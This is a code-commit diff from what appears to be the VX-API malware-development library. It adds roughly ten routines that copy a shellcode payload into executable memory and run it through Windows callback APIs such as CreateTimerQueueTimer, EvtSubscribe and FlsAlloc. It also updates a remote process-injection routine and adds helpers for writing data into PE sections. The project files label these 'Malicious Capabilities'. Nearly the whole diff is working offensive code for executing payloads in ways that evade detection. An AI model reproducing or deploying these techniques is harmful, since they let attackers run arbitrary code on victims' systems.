if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &Buffer))
goto EXIT_ROUTINE;
SectionHeaderArray = (PIMAGE_SECTION_HEADER)(ULONGLONG(Nt) + sizeof(IMAGE_NT_HEADERS));
for (DWORD dwX = 0; dwX < File->NumberOfSections; dwX++)
{
if (StringCompareA((PCHAR)SectionHeaderArray[dwX].Name, SectionName) == ERROR_SUCCESS)
bFlag = TRUE;
}
EXIT_ROUTINE:
if (Buffer)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Buffer);
if (hHandle)
CloseHandle(hHandle);
return bFlag;
}
BOOL IsPeSectionA(_In_ LPCSTR PathToBinary, _In_ LPCSTR PeSectionName)
{
BOOL bFlag = FALSE;
HANDLE hHandle = INVALID_HANDLE_VALUE;
PBYTE Buffer = NULL;
LONGLONG SizeOfTargetBinary = 0L;
PIMAGE_DOS_HEADER Dos = NULL;
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
PIMAGE_SECTION_HEADER Section = NULL;
PIMAGE_SECTION_HEADER SectionHeaderArray = NULL;
SizeOfTargetBinary = GetFileSizeFromPathW((PWCHAR)PathToBinary, FILE_ATTRIBUTE_NORMAL);
if (SizeOfTargetBinary == INVALID_FILE_SIZE)
goto EXIT_ROUTINE;
hHandle = CreateFileA(PathToBinary, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hHandle == INVALID_HANDLE_VALUE)
goto EXIT_ROUTINE;
Buffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
if (Buffer == NULL)
goto EXIT_ROUTINE;
if (!ReadFile(hHandle, Buffer, SizeOfTargetBinary, NULL, NULL))
goto EXIT_ROUTINE;
if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &Buffer))
goto EXIT_ROUTINE;
SectionHeaderArray = (PIMAGE_SECTION_HEADER)(ULONGLONG(Nt) + sizeof(IMAGE_NT_HEADERS));
for (DWORD dwX = 0; dwX < File->NumberOfSections; dwX++)
{
if (StringCompareA((PCHAR)SectionHeaderArray[dwX].Name, PeSectionName) == ERROR_SUCCESS)
bFlag = TRUE;
}
EXIT_ROUTINE:
if (Buffer)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Buffer);
if (hHandle)
CloseHandle(hHandle);
return bFlag;
}

4
VX-API/IsProcessRunning.cpp
View File

@ -2,7 +2,7 @@
#include <psapi.h>
BOOL IsProcessRunningA(_In_ PCHAR ProcessNameWithExtension)
BOOL IsProcessRunningA(_In_ LPCSTR ProcessNameWithExtension)
{
HANDLE hProcess = NULL;
@ -43,7 +43,7 @@ BOOL IsProcessRunningA(_In_ PCHAR ProcessNameWithExtension)
return FALSE;
}
BOOL IsProcessRunningW(_In_ PWCHAR ProcessNameWithExtension)
BOOL IsProcessRunningW(_In_ LPCWSTR ProcessNameWithExtension)
{
HANDLE hProcess = NULL;

7
VX-API/Main.cpp
View File

@ -4,10 +4,13 @@ INT main(VOID)
{
PCHAR Buffer = NULL;
DWORD dwSize = 0;
HMODULE hMod = NULL;
Buffer = GenericShellcodeHelloWorldMessageBoxA(&dwSize);
Buffer = GenericShellcodeOpenCalcExitThread(&dwSize);
MpfSceViaMessageBoxIndirectW((PBYTE)Buffer, dwSize);
//MpfPiControlInjection((PBYTE)Buffer, dwSize, 19768);
//MpfSceViaInitOnceExecuteOnce((PBYTE)Buffer, dwSize);
if (Buffer)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Buffer);

24
VX-API/MpfPiControlInjection.cpp
View File

@ -17,7 +17,7 @@ BOOL MpfPiControlInjection(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _I
HANDLE hHandle = NULL;
LPVOID BaseAddress = NULL;
INPUT Input = { 0 };
BOOL bFlag = FALSE;
BOOL bFlag = FALSE;
hNtdll = GetModuleHandleEx2W(L"ntdll.dll");
hKernelbase = GetModuleHandleEx2W(L"kernelbase.dll");
@ -47,20 +47,30 @@ BOOL MpfPiControlInjection(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _I
if (GetConsoleProcessList(ConsoleAttachList, 2) < 2)
goto EXIT_ROUTINE;
if (ConsoleAttachList[0] != GetCurrentProcessIdFromTeb())
if (ConsoleAttachList[0] != GetCurrentProcessId())
ParentId = ConsoleAttachList[0];
else
ParentId = ConsoleAttachList[1];
FreeConsole();
AttachConsole(TargetProcessId);
if (!FreeConsole())
goto EXIT_ROUTINE;
hWindow = GetConsoleWindow();
if (!AttachConsole(TargetProcessId))
goto EXIT_ROUTINE;
FreeConsole();
AttachConsole(ParentId);
hWindow = (HWND)GetPeb()->ProcessParameters->ConsoleHandle;
if (hWindow == NULL)
goto EXIT_ROUTINE;
if (!FreeConsole())
goto EXIT_ROUTINE;
if (!AttachConsole(ParentId))
goto EXIT_ROUTINE;
hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, TargetProcessId);
if (hHandle == NULL)
goto EXIT_ROUTINE;
BaseAddress = VirtualAllocEx(hHandle, NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BaseAddress == NULL)

48
VX-API/MpfSceViaCertFindChainInStore.cpp Normal file
View File

@ -0,0 +1,48 @@
#include "Win32Helper.h"
VOID InvokeCertFindChainInStoreCallbackRoutine(LPVOID lpParameter)
{
/*
HCERTSTORE hCertStore = NULL;
CERT_CHAIN_FIND_ISSUER_PARA Issuer = { 0 };
hCertStore = CertOpenStore(CERT_STORE_PROV_SYSTEM, 0, NULL, CERT_SYSTEM_STORE_CURRENT_USER, L"My");
if (hCertStore == NULL)
return;
Issuer.cbSize = sizeof(CERT_CHAIN_FIND_ISSUER_PARA);
Issuer.pfnFindCallback = (PFN_CERT_CHAIN_FIND_BY_ISSUER_CALLBACK)lpParameter;
CertFindChainInStore(hCertStore, X509_ASN_ENCODING, 0, CERT_CHAIN_FIND_BY_ISSUER, &Issuer, NULL);
if(hCertStore)
CertCloseStore(hCertStore, 0);
*/
}
BOOL MpfSceViaCertFindChainInStore(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
/*
!!! UNIMPLEMENTED - UNABLE TO GET SHELLCODE EXECUTION WORKING!!!
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCertFindChainInStoreCallbackRoutine, BinAddress, INFINITE);
return TRUE;
*/
return FALSE;
}

56
VX-API/MpfSceViaCreateThreadpoolWait.cpp Normal file
View File

@ -0,0 +1,56 @@
#include "Win32Helper.h"
VOID InvokeCreateThreadpoolWaitCallbackRoutine(LPVOID lpParameter)
{
/*
HANDLE hEvent;
PTP_WAIT Wait = NULL;
hEvent = CreateEventW(NULL, FALSE, FALSE, NULL);
if (hEvent == NULL)
goto EXIT_ROUTINE;
Wait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)lpParameter, NULL, NULL);
if(Wait == NULL)
goto EXIT_ROUTINE;
SetThreadpoolWait(Wait, hEvent, 0);
SetEvent(hEvent);
WaitForThreadpoolWaitCallbacks(Wait, FALSE);
SetEvent(hEvent);
Sleep(10000); //arbitrary sleep time...
EXIT_ROUTINE:
if (hEvent)
CloseHandle(hEvent);
return;
*/
}
BOOL MpfSceViaCreateThreadpoolWait(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
/*
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCreateThreadpoolWaitCallbackRoutine, BinAddress, INFINITE);
return TRUE;
*/
return FALSE;
}

47
VX-API/MpfSceViaCreateTimerQueueTimer.cpp Normal file
View File

@ -0,0 +1,47 @@
#include "Win32Helper.h"
VOID InvokeCreateTimerQueueTimerCallbackRoutine(LPVOID lpParameter)
{
HANDLE Timer = NULL, Queue = NULL, Event = NULL;
Queue = CreateTimerQueue();
if (Queue == NULL)
goto EXIT_ROUTINE;
Event = CreateEventW(NULL, TRUE, FALSE, NULL);
if (Event == NULL)
goto EXIT_ROUTINE;
if (!CreateTimerQueueTimer(&Timer, Queue, (WAITORTIMERCALLBACK)lpParameter, NULL, 100, 0, 0))
goto EXIT_ROUTINE;
WaitForSingleObject(Event, INFINITE);
EXIT_ROUTINE:
if (Event)
CloseHandle(Event);
#pragma warning( push )
#pragma warning( disable : 6031)
if(Queue)
DeleteTimerQueue(Queue);
#pragma warning( pop )
return;
}
BOOL MpfSceViaCreateTimerQueueTimer(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCreateTimerQueueTimerCallbackRoutine, BinAddress, INFINITE);
return TRUE;
}

23
VX-API/MpfSceViaCryptEnumOIDInfo.cpp Normal file
View File

@ -0,0 +1,23 @@
#include "Win32Helper.h"
#include "Win32Helper.h"
VOID InvokeCryptEnumOIDInfoCallbackRoutine(LPVOID lpParameter)
{
CryptEnumOIDInfo(NULL, NULL, NULL, (PFN_CRYPT_ENUM_OID_INFO)lpParameter);
}
BOOL MpfSceViaCryptEnumOIDInfo(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCryptEnumOIDInfoCallbackRoutine, BinAddress, INFINITE);
return TRUE;
}

37
VX-API/MpfSceViaDSA_EnumCallback.cpp Normal file
View File

@ -0,0 +1,37 @@
#include "Win32Helper.h"
VOID InvokeDSA_EnumCallbackCallbackRoutine(LPVOID lpParameter)
{
HDSA hDSA = NULL;
hDSA = DSA_Create(1, 1);
if (hDSA == NULL)
goto EXIT_ROUTINE;
if (DSA_InsertItem(hDSA, 0x7ffffff, &hDSA) == -1)
goto EXIT_ROUTINE;
DSA_EnumCallback(hDSA, (PFNDAENUMCALLBACK)lpParameter, NULL);
EXIT_ROUTINE:
if(hDSA)
DSA_Destroy(hDSA);
return;
}
BOOL MpfSceViaDSA_EnumCallback(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeDSA_EnumCallbackCallbackRoutine, BinAddress, INFINITE);
return TRUE;
}

33
VX-API/MpfSceViaEnumPropsExW.cpp Normal file
View File

@ -0,0 +1,33 @@
#include "Win32Helper.h"
VOID InvokeEnumPropsExWCallbackRoutine(LPVOID lpParameter)
{
/*
THIS FUNCTION FAILS- NOTE
GetTopWindow function (winuser.h)
If the function succeeds, the return value is a handle to the child window at the top
of the Z order. If the specified window has no child windows, the return value is NULL.
To get extended error information, use the GetLastError function.
*/
EnumPropsExW(GetTopWindow(NULL), (PROPENUMPROCEXW)lpParameter, NULL);
}
BOOL MpfSceViaEnumPropsExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumPropsExWCallbackRoutine, BinAddress, INFINITE);
return TRUE;
}

37
VX-API/MpfSceViaEvtSubscribe.cpp Normal file
View File

@ -0,0 +1,37 @@
#include "Win32Helper.h"
VOID InvokeEvtSubscribeCallbackRoutine(LPVOID lpParameter)
{
EVT_HANDLE hEvent = NULL;
hEvent = EvtSubscribe(NULL, NULL, L"Application", L"*[System/EventID=1]", NULL, NULL, (EVT_SUBSCRIBE_CALLBACK)lpParameter, EvtSubscribeToFutureEvents);
if (hEvent == NULL)
goto EXIT_ROUTINE;
if (CveEventWrite(L"2022-123456", L"Pseudo-random-string") != ERROR_SUCCESS)
goto EXIT_ROUTINE;
Sleep(10000); //arbitrary sleep time..
EXIT_ROUTINE:
if(hEvent)
EvtClose(hEvent);
return;
}
BOOL MpfSceViaEvtSubscribe(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEvtSubscribeCallbackRoutine, BinAddress, INFINITE);
return TRUE;
}

28
VX-API/MpfSceViaFlsAlloc.cpp Normal file
View File

@ -0,0 +1,28 @@
#include "Win32Helper.h"
VOID InvokeFlsAllocCallbackRoutine(LPVOID lpParameter)
{
DWORD dwIndex = ERROR_SUCCESS;
dwIndex = FlsAlloc((PFLS_CALLBACK_FUNCTION)lpParameter);
if (dwIndex == FLS_OUT_OF_INDEXES)
return;
FlsSetValue(dwIndex, (PVOID)"Data");
}
BOOL MpfSceViaFlsAlloc(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeFlsAllocCallbackRoutine, BinAddress, INFINITE);
return TRUE;
}

21
VX-API/MpfSceViaImmEnumInputContext.cpp Normal file
View File

@ -0,0 +1,21 @@
#include "Win32Helper.h"
VOID InvokeImmEnumInputContextCallbackRoutine(LPVOID lpParameter)
{
ImmEnumInputContext(NULL, (IMCENUMPROC)lpParameter, NULL);
}
BOOL MpfSceViaImmEnumInputContext(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeImmEnumInputContextCallbackRoutine, BinAddress, INFINITE);
return TRUE;
}

24
VX-API/MpfSceViaInitOnceExecuteOnce.cpp Normal file
View File

@ -0,0 +1,24 @@
#include "Win32Helper.h"
VOID InvokeInitOnceExecuteOnceCallbackRoutine(LPVOID lpParameter)
{
INIT_ONCE InitOnce = INIT_ONCE_STATIC_INIT;
PVOID Context;
InitOnceExecuteOnce(&InitOnce, (PINIT_ONCE_FN)lpParameter, NULL, &Context);
}
BOOL MpfSceViaInitOnceExecuteOnce(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeInitOnceExecuteOnceCallbackRoutine, BinAddress, INFINITE);
return TRUE;
}

4
VX-API/StringConcat.cpp
View File

@ -1,13 +1,13 @@
#include "StringManipulation.h"
PWCHAR StringConcatW(_Inout_ PWCHAR String, _In_ PWCHAR String2)
PWCHAR StringConcatW(_Inout_ PWCHAR String, _In_ LPCWSTR String2)
{
StringCopyW(&String[StringLengthW(String)], String2);
return String;
}
PCHAR StringConcatA(_Inout_ PCHAR String, _In_ PCHAR String2)
PCHAR StringConcatA(_Inout_ PCHAR String, _In_ LPCSTR String2)
{
StringCopyA(&String[StringLengthA(String)], String2);

4
VX-API/StringCopy.cpp
View File

@ -1,6 +1,6 @@
#include "StringManipulation.h"
PCHAR StringCopyA(_Inout_ PCHAR String1, _In_ PCHAR String2)
PCHAR StringCopyA(_Inout_ PCHAR String1, _In_ LPCSTR String2)
{
PCHAR p = String1;
@ -9,7 +9,7 @@ PCHAR StringCopyA(_Inout_ PCHAR String1, _In_ PCHAR String2)
return String1;
}
PWCHAR StringCopyW(_Inout_ PWCHAR String1, _In_ PWCHAR String2)
PWCHAR StringCopyW(_Inout_ PWCHAR String1, _In_ LPCWSTR String2)
{
PWCHAR p = String1;

9
VX-API/StringManipulation.h
View File

@ -9,10 +9,11 @@ PCHAR SecureStringCopyA(_Inout_ PCHAR String1, _In_ LPCSTR String2, _In_ SIZE_T
PWCHAR SecureStringCopyW(_Inout_ PWCHAR String1, _In_ LPCWSTR String2, _In_ SIZE_T Size);
INT StringCompareA(_In_ LPCSTR String1, _In_ LPCSTR String2);
INT StringCompareW(_In_ LPCWSTR String1, _In_ LPCWSTR String2);
PWCHAR StringConcatW(_Inout_ PWCHAR String, _In_ PWCHAR String2);
PCHAR StringConcatA(_Inout_ PCHAR String, _In_ PCHAR String2);
PCHAR StringCopyA(_Inout_ PCHAR String1, _In_ PCHAR String2);
PWCHAR StringCopyW(_Inout_ PWCHAR String1, _In_ PWCHAR String2);
PWCHAR StringConcatW(_Inout_ PWCHAR String, _In_ LPCWSTR String2);
PCHAR StringConcatA(_Inout_ PCHAR String, _In_ LPCSTR String2);
PCHAR StringCopyA(_Inout_ PCHAR String1, _In_ LPCSTR String2);
PWCHAR StringCopyW(_Inout_ PWCHAR String1, _In_ LPCWSTR String2);
//todo
PCHAR StringFindSubstringA(_In_ PCHAR String1, _In_ PCHAR String2);
PWCHAR StringFindSubstringW(_In_ PWCHAR String1, _In_ PWCHAR String2);
SIZE_T StringLengthA(_In_ LPCSTR String);

14
VX-API/VX-API.vcxproj
View File

@ -131,6 +131,7 @@
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="AddSectionToPeFile.cpp" />
<ClCompile Include="AdfCloseHandleOnInvalidAddress.cpp" />
<ClCompile Include="AdfIsCreateProcessDebugEventCodeSet.cpp" />
<ClCompile Include="AdfOpenProcessOnCsrss.cpp" />
@ -168,6 +169,7 @@
<ClCompile Include="ExceptHandlerCallbackRoutine.cpp" />
<ClCompile Include="Ex_GetHandleOnDeviceHttpCommunication.cpp" />
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp" />
<ClCompile Include="IsPeSection.cpp" />
<ClCompile Include="MiscGenericShellcodePayloads.cpp" />
<ClCompile Include="GetByteArrayFromFile.cpp" />
<ClCompile Include="GetCurrentDirectoryFromUserProcessParameters.cpp" />
@ -258,6 +260,11 @@
<ClCompile Include="MpfSceViaCDefFolderMenu_Create2.cpp" />
<ClCompile Include="MpfSceViaCertEnumSystemStore.cpp" />
<ClCompile Include="MpfSceViaCertEnumSystemStoreLocation.cpp" />
<ClCompile Include="MpfSceViaCertFindChainInStore.cpp" />
<ClCompile Include="MpfSceViaCreateThreadpoolWait.cpp" />
<ClCompile Include="MpfSceViaCreateTimerQueueTimer.cpp" />
<ClCompile Include="MpfSceViaCryptEnumOIDInfo.cpp" />
<ClCompile Include="MpfSceViaDSA_EnumCallback.cpp" />
<ClCompile Include="MpfSceViaEnumChildWindows.cpp" />
<ClCompile Include="MpfSceViaEnumDateFormatsW.cpp" />
<ClCompile Include="MpfSceViaEnumDesktopsW.cpp" />
@ -269,6 +276,7 @@
<ClCompile Include="MpfSceViaEnumFontsW.cpp" />
<ClCompile Include="MpfSceViaEnumLanguageGroupLocalesW.cpp" />
<ClCompile Include="MpfSceViaEnumObjects.cpp" />
<ClCompile Include="MpfSceViaEnumPropsExW.cpp" />
<ClCompile Include="MpfSceViaEnumPwrSchemes.cpp" />
<ClCompile Include="MpfSceViaEnumResourceTypesExW.cpp" />
<ClCompile Include="MpfSceViaEnumSystemCodePagesW.cpp" />
@ -280,6 +288,10 @@
<ClCompile Include="MpfSceViaEnumUILanguagesW.cpp" />
<ClCompile Include="MpfSceViaEnumWindows.cpp" />
<ClCompile Include="MpfSceViaEnumWindowStationsW.cpp" />
<ClCompile Include="MpfSceViaEvtSubscribe.cpp" />
<ClCompile Include="MpfSceViaFlsAlloc.cpp" />
<ClCompile Include="MpfSceViaImmEnumInputContext.cpp" />
<ClCompile Include="MpfSceViaInitOnceExecuteOnce.cpp" />
<ClCompile Include="MpfSceViaK32EnumPageFilesW.cpp" />
<ClCompile Include="MpfSceViaMessageBoxIndirectW.cpp" />
<ClCompile Include="ProxyRegisterWaitLoadLibrary.cpp" />
@ -290,6 +302,7 @@
<ClCompile Include="ShutdownHardwareBreakpointEngine.cpp" />
<ClCompile Include="SleepObfuscationViaVirtualProtect.cpp" />
<ClCompile Include="SnapshotInsertHardwareBreakpointHookIntoTargetThread.cpp" />
<ClCompile Include="WriteDataToPeSection.cpp" />
<ClCompile Include="__unstable__preview__MpfSilentInstallGoogleChromePlugin.cpp" />
<ClCompile Include="SendIcmpEchoMessageToIPv4Host.cpp" />
<ClCompile Include="OleGetClipboardData.cpp" />
@ -303,7 +316,6 @@
<ClCompile Include="SetLastErrorInTeb.cpp" />
<ClCompile Include="SetLastNtStatusInTeb.cpp" />
<ClCompile Include="SetProcessPrivilegeToken.cpp" />
<ClCompile Include="ShellcodeExecutionViaFunctionCallbackMain.cpp" />
<ClCompile Include="ShlwapiCharStringToWCharString.cpp" />
<ClCompile Include="ShlwapiWCharStringToCharString.cpp" />
<ClCompile Include="StringCompare.cpp" />

42
VX-API/VX-API.vcxproj.filters
View File

@ -552,9 +552,6 @@
<ClCompile Include="MpfPiControlInjection.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
</ClCompile>
<ClCompile Include="ShellcodeExecutionViaFunctionCallbackMain.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="UacBypassFodHelperMethod.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\UAC Bypasses</Filter>
</ClCompile>
@ -651,6 +648,45 @@
<ClCompile Include="MpfSceViaMessageBoxIndirectW.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaImmEnumInputContext.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaCertFindChainInStore.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaEnumPropsExW.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaCreateThreadpoolWait.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaCryptEnumOIDInfo.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaDSA_EnumCallback.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaCreateTimerQueueTimer.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaEvtSubscribe.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaInitOnceExecuteOnce.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaFlsAlloc.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="IsPeSection.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="AddSectionToPeFile.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="WriteDataToPeSection.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Internal.h">

115
VX-API/Win32Helper.h
View File

@ -16,6 +16,9 @@
#include <windns.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <imm.h>
#include <dpa_dsa.h>
#include <winevt.h>
#pragma comment(lib, "Dnsapi.lib")
@ -26,6 +29,9 @@
#pragma comment(lib, "Urlmon.lib")
#pragma comment(lib, "PowrProf.lib")
#pragma comment(lib, "Ws2_32.lib")
#pragma comment(lib, "Imm32.lib")
#pragma comment(lib, "Comctl32.lib")
#pragma comment(lib, "Wevtapi.lib")
#ifndef NT_SUCCESS
@ -80,40 +86,33 @@ DWORD RtlNtStatusToDosErrorViaImport(_In_ NTSTATUS Status);
/*******************************************
CRYPTOGRAPHY RELATED
*******************************************/
//#define TOKENIZE( x ) #x
//#define CONCAT3( X, Y, Z ) X##Y##Z
//#define HASHALGOA HashStringDjb2A
//#define hasha( VAL ) constexpr auto CONCAT3(hash,VAL,A) = HASHALGOA((PCHAR)TOKENIZE(VAL))
//#define hashw( VAL ) constexpr auto CONCAT3(hash,VAL,W) = HASHALGOA((PWCHAR)TOKENIZE(VAL))
DWORD HashStringDjb2A(_In_ PCHAR String);
DWORD HashStringDjb2W(_In_ PWCHAR String);
ULONG HashStringFowlerNollVoVariant1aA(_In_ PCHAR String);
ULONG HashStringFowlerNollVoVariant1aW(_In_ PWCHAR String);
UINT32 HashStringJenkinsOneAtATime32BitA(_In_ PCHAR String);
UINT32 HashStringJenkinsOneAtATime32BitW(_In_ PWCHAR String);
DWORD HashStringLoseLoseA(_In_ PCHAR String);
DWORD HashStringLoseLoseW(_In_ PWCHAR String);
INT HashStringRotr32A(_In_ PCHAR String);
INT HashStringRotr32W(_In_ PWCHAR String);
DWORD HashStringSdbmA(_In_ PCHAR String);
DWORD HashStringSdbmW(_In_ PWCHAR String);
UINT32 HashStringSuperFastHashA(_In_ PCHAR String);
UINT32 HashStringSuperFastHashW(_In_ PWCHAR String);
INT HashStringUnknownGenericHash1A(_In_ PCHAR String);
INT HashStringUnknownGenericHash1W(_In_ PWCHAR String);
INT32 HashStringSipHashA(_In_ PCHAR String);
INT32 HashStringSipHashW(_In_ PWCHAR String);
INT32 HashStringMurmurA(_In_ PCHAR String);
INT32 HashStringMurmurW(_In_ PWCHAR String);
BOOL CreateMd5HashFromFilePathW(_In_ PWCHAR FilePath, _Inout_ PWCHAR Md5Hash);
BOOL CreateMd5HashFromFilePathA(_In_ PCHAR FilePath, _Inout_ PCHAR Md5Hash);
DWORD HashStringDjb2A(_In_ LPCSTR String);
DWORD HashStringDjb2W(_In_ LPCWSTR String);
ULONG HashStringFowlerNollVoVariant1aA(_In_ LPCSTR String);
ULONG HashStringFowlerNollVoVariant1aW(_In_ LPCWSTR String);
UINT32 HashStringJenkinsOneAtATime32BitA(_In_ LPCSTR String);
UINT32 HashStringJenkinsOneAtATime32BitW(_In_ LPCWSTR String);
DWORD HashStringLoseLoseA(_In_ LPCSTR String);
DWORD HashStringLoseLoseW(_In_ LPCWSTR String);
INT HashStringRotr32A(_In_ LPCSTR String);
INT HashStringRotr32W(_In_ LPCWSTR String);
DWORD HashStringSdbmA(_In_ LPCSTR String);
DWORD HashStringSdbmW(_In_ LPCWSTR String);
UINT32 HashStringSuperFastHashA(_In_ LPCSTR String);
UINT32 HashStringSuperFastHashW(_In_ LPCWSTR String);
INT HashStringUnknownGenericHash1A(_In_ LPCSTR String);
INT HashStringUnknownGenericHash1W(_In_ LPCWSTR String);
INT32 HashStringSipHashA(_In_ LPCSTR String);
INT32 HashStringSipHashW(_In_ LPCWSTR String);
INT32 HashStringMurmurA(_In_ LPCSTR String);
INT32 HashStringMurmurW(_In_ LPCWSTR String);
BOOL CreateMd5HashFromFilePathW(_In_ LPCWSTR FilePath, _Inout_ PWCHAR Md5Hash);
BOOL CreateMd5HashFromFilePathA(_In_ LPCSTR FilePath, _Inout_ PCHAR Md5Hash);
INT CreatePseudoRandomInteger(_In_ ULONG Seed);
PWCHAR CreatePseudoRandomStringW(_In_ SIZE_T dwLength, _In_ ULONG Seed);
PCHAR CreatePseudoRandomStringA(_In_ SIZE_T dwLength, _In_ ULONG Seed);
